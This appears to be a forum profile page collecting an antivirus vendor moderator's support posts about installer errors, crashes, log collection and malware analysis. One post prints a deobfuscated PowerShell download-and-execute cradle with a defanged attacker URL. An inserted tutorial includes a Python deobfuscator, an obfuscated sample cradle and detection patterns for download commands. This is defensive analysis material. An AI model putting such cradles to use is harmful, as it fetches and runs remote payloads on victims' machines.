Peter Randziak

ESET Moderators
Everything posted by Peter Randziak

  1. Hello @T3chGuy007, thank you for providing us with the logs. We checked them and found: MSI (s) (BC!EC) [08:06:18:420]: Creating MSIHANDLE (422) of type 790531 for thread 8172 ERROR: (preps) Preparing of service failed. So it seems that the agent cannot be stopped for some reason. Please try to install the stand-alone agent on the affected machine and 1. run the installation with the lvx parameter; 2. capture the events in the system during the installation with Process Monitor with advanced output enabled, and after it fails export the log in native PML format; 3. enable blocking of all blocked operations by HIPS in the HIPS setup on the Endpoint. Compress the logs, upload them to a safe location and send me and TomasP a PM with the download details so we can check them. Regards, P.R.
  2. One more update from the research team. It seems that the original script is base64 encoded and has been detected as the PowerShell/TrojanDownloader.Agent.DV trojan since March 5. Regards, P.R.
  3. Hello @viper37, I got a response from the Dev team. The issue will be fixed in EES v. 7.1.2039 and EES v. 7.0.2108. A fixed build should be available within a few weeks. We apologize for the inconvenience caused. Regards, P.R.
  4. Hello @pfnothing and @itman, I forwarded your findings to the lab. When it comes to the script extractions, the numbers in {} are indexes into the array of chars in the quotation marks (-f "t","2"," …). @pfnothing, it would be great if you could provide us with the script to analyze, ideally via a private message with a reference to this forum topic, in an encrypted archive (set the password to infected so it won't be detected on its route to us 🙂 ). Thank you, P.R.
  5. I made the edit in advance, so as not to share the URL to the malicious binary. I sent it to samples@eset.com, i.e. our research lab, and I got this response :-) I'm a tech support guy, so I do not have a mastery of the black magic :-D Yes, we tried to download it as well of course, but we didn't succeed either. It might have been moved, or the request might have been filtered by some specific condition on the server. Or it might just have been removed / moved by the server operators. I would check the detection logs, ... Regards, P.R.
  6. Hello Emiel, glad to hear that, thank you for keeping us posted. P.R.
  7. Hello @T3chGuy007, so can you please provide us with it so we can check it? I found a similar case reported by our QA, "Installation failed with error (package=0, error=8257588)" (reference for us: P_ESMC-16163), but it should be fixed in the latest version of ESMC; not sure if it requires the newest agent as well, as you have the old ESET Remote Administrator Agent 6.5.522.0. "This seems to be caused by a policy having connection settings. The custom policy in setup causes those settings to be locked, and the ConfigSetServerConnection is trying to set the setting but it's locked by policy, so it fails..." May I ask why you upgrade via the All-in-one installer? I would recommend first trying to upgrade via the Upgrade infrastructure task, as the All-in-one installer's primary use is deployment, not upgrading, ... Regards, P.R.
  8. Hello @pfnothing, after deobfuscation: (new-object System.Net.WebClient).DownloadFile('hXXp://services.enigmasolutions.xyz:2052/scg.exe', $env:TEMP + '\ASfkaop.exe');Start-Process($env:TEMP + '\ASfkaop.exe'); Do you happen to have the scg.exe left on the system? If not, you can try to recover it. If yes, can you please send me a copy of it in an encrypted archive via a private message to check? Regards, P.R.
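The two posts above (4 and 8) describe the same analysis step: PowerShell scripts obfuscated with the -f format operator, where each {n} in the template indexes the quoted strings after -f, and which after resolution turn out to be a WebClient.DownloadFile plus Start-Process download cradle. The following is an added example, not ESET's code and not the script from the thread: a small Python deobfuscator that resolves such format strings, collapses the &("...") and .("...") call-operator wrappers, and then reports the URLs and cradle indicators found. The sample script is constructed for this example; the URL (example.invalid, defanged as hxxp like the post above) is a placeholder, and only plain {n} placeholders and string literals without embedded quotes are handled.

```python
import re

# Constructed sample (not the script from the thread): a download cradle
# obfuscated with PowerShell's -f format operator. Each {n} is an index
# into the comma-separated strings after -f. The URL is a placeholder
# (example.invalid) and is defanged with hxxp, as in the post above.
SAMPLE = (
    r'$c = &("{1}{0}" -f "bject","New-O") '
    r'("{0}{2}{1}" -f "System.Net.","lient","WebC");'
    r'$c.("{1}{0}" -f "loadFile","Down")'
    r"('hxxp://example.invalid:8080/payload.exe', $env:TEMP + '\drop.exe');"
    r"""&("{0}{1}" -f "Start-","Process")($env:TEMP + '\drop.exe')"""
)

# A single- or double-quoted PowerShell string literal without escapes.
STR = r'''(?:"[^"]*"|'[^']*')'''

# ( "template" -f "arg0","arg1",... ) : the pattern discussed in post 4.
FMT_RE = re.compile(
    r"\(\s*(?P<tmpl>" + STR + r")\s*-f\s*"
    r"(?P<args>" + STR + r"(?:\s*,\s*" + STR + r")*)\s*\)",
    re.IGNORECASE,
)
PLACEHOLDER_RE = re.compile(r"\{(\d+)\}")  # plain {n} only, no {n,w} / {n:fmt}

# &("Name") and .("Name") are the call operator / member access applied to
# a string; once the string is known they collapse to a plain identifier.
CALL_RE = re.compile(r'&\s*\(\s*"([^"]*)"\s*\)')
MEMBER_RE = re.compile(r'\.\(\s*"([^"]*)"\s*\)')

# Accept both live (http) and defanged (hxxp) URLs.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\")]+", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"\b(DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|"
    r"Invoke-Expression|IEX|Start-Process)\b",
    re.IGNORECASE,
)


def _resolve_one(m):
    template = m.group("tmpl")[1:-1]
    args = [s[1:-1] for s in re.findall(STR, m.group("args"))]

    def fill(p):
        i = int(p.group(1))
        # An index past the argument list is left untouched rather than guessed.
        return args[i] if i < len(args) else p.group(0)

    return '("' + PLACEHOLDER_RE.sub(fill, template) + '")'


def resolve_format_strings(script):
    """Replace every ("..{n}.." -f "a","b",...) with the assembled string."""
    return FMT_RE.sub(_resolve_one, script)


def deobfuscate(script):
    """Resolve -f format strings, then unwrap &("cmd") and .("member")."""
    clean = resolve_format_strings(script)
    clean = CALL_RE.sub(r"\1", clean)
    clean = MEMBER_RE.sub(r".\1", clean)
    return clean


def analyze(script):
    """Return the cleaned script plus the URLs and cradle verbs it contains."""
    clean = deobfuscate(script)
    return {
        "deobfuscated": clean,
        "urls": URL_RE.findall(clean),
        "indicators": sorted({m.group(0) for m in CRADLE_RE.finditer(clean)},
                             key=str.lower),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE)
    print(result["deobfuscated"])
    print("URLs:", result["urls"])
    print("Indicators:", result["indicators"])
```

Run on the constructed sample, the script resolves to a plain New-Object System.Net.WebClient / DownloadFile / Start-Process chain of the same shape as the one in post 8, and the reported URL is what you would defang and submit alongside the sample. Nested or escaped string literals, and the other -f placeholder forms, would need a real tokenizer rather than these regexes.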
  9. Hello @viper37, thank you for providing us with the dump and logs. I briefly checked them and opened a ticket with our dev team in order to investigate the root cause deeply. We will keep you posted. Regards, P.R. tracking note: P_EESW-3267
  10. @Supercows, good, expect a private message from me within a few minutes. P.R.
  11. Dear @renekalff sure, I will send you a private message with details in a few moments. Regards, P.R.
  12. Hello @MarcFL, congratulations on your new device. Can you please submit a ticket directly from your device so we can check the corresponding logs? Thank you, P.R.
  13. @Oliver Hansen, sure, I will contact you by private message in a few moments. Thank you, P.R.
  14. @blaxxz, have you tried to contact support by phone?
  15. Hello @Haresh2015 , sure, I will send you a private message with details in a few moments. Regards, P.R.
  16. Hello @Daniel Egberts, sure, I will contact you by private message in a few moments. Regards, P.R.
  17. Thank you, I will check them and pass to the dev team, if needed. Peter
  18. Hello @Skynet, good, please keep us posted. There are quite a lot of changes between v.6 and v.7, and moreover this issue might be caused by an updated module; currently we have about 50 of them, ... Once the issue reappears we should be able to find quite quickly from the logs what's wrong, ... Thank you, P.R.
  19. Hello Stan, thank you for considering our solution and for your positive feedback on it. The solution you propose is quite easy: you just need to set up an SMTP relay and equip it with ESET Mail Security for Linux / FreeBSD. The scenarios are described in the user guide https://download.eset.com/com/eset/apps/business/es/linux/latest/eset_ems_45_userguide_enu.pdf, just search for "relay". Regards, P.R.
  20. Hello @brandobot, good, thank you, I will check them and will reply to you via private message(s). Regards, P.R.
  21. Hello @brandobot, good, thank you for the answers and the logs. I had them checked by my colleague, who has expertise in macOS support, and I replied to you via private message. Regards, P.R.
  22. Hello @brandobot, 1. Does it crash only after the wake-up? 2. If yes, after each one or just sometimes? 3. Is the issue exclusive to the new ("t2 chipset macOS laptops (2018 and newer)") systems only? 4. What exactly crashes, just the ESET app or the entire system? Can you please collect the logs right after the crash and send them to me via a private message with a reference to this thread so I can have them checked? Regards, P.R.
  23. Hello @Skynet, 1. I would advise installing v.7 with the default settings before working hours, running a manual modules update, and not applying any additional policies via ESMC/ERA. I checked one case very similar to yours and they had deeper scanning set, thus consuming many more resources. 2. Disable the "Startup scan task after user logon" in the scheduler. 3. Have Process Monitor prepared. Once the high load starts, please record about a minute with Process Monitor (with advanced output enabled) and save it as a native .pml log. 4. Dump ekrn via the built-in option: Diagnostics - Create diagnostic dump. 5. Collect the logs via ESET Log Collector. 6. You may then restore the server's functionality; I assume it shouldn't take more than 3 minutes to collect the 3 logs. In the ticket mentioned, the load dropped about 3 minutes after disabling the real-time file system protection. In case it doesn't happen with the "Startup scan task after user logon" in the scheduler disabled, you may try to enable it and try to get the logs with it. Once you have the logs / any results, please pack them, upload them to a safe location and send me the download details via private message to check. Please let us know any news regarding this. Thank you in advance, P.R.
  24. Hello @Mehr, may I ask what exact contact method you used to contact your local support, i.e. the URL of the web form you used / the e-mail address, so we can check it? Regards, P.R.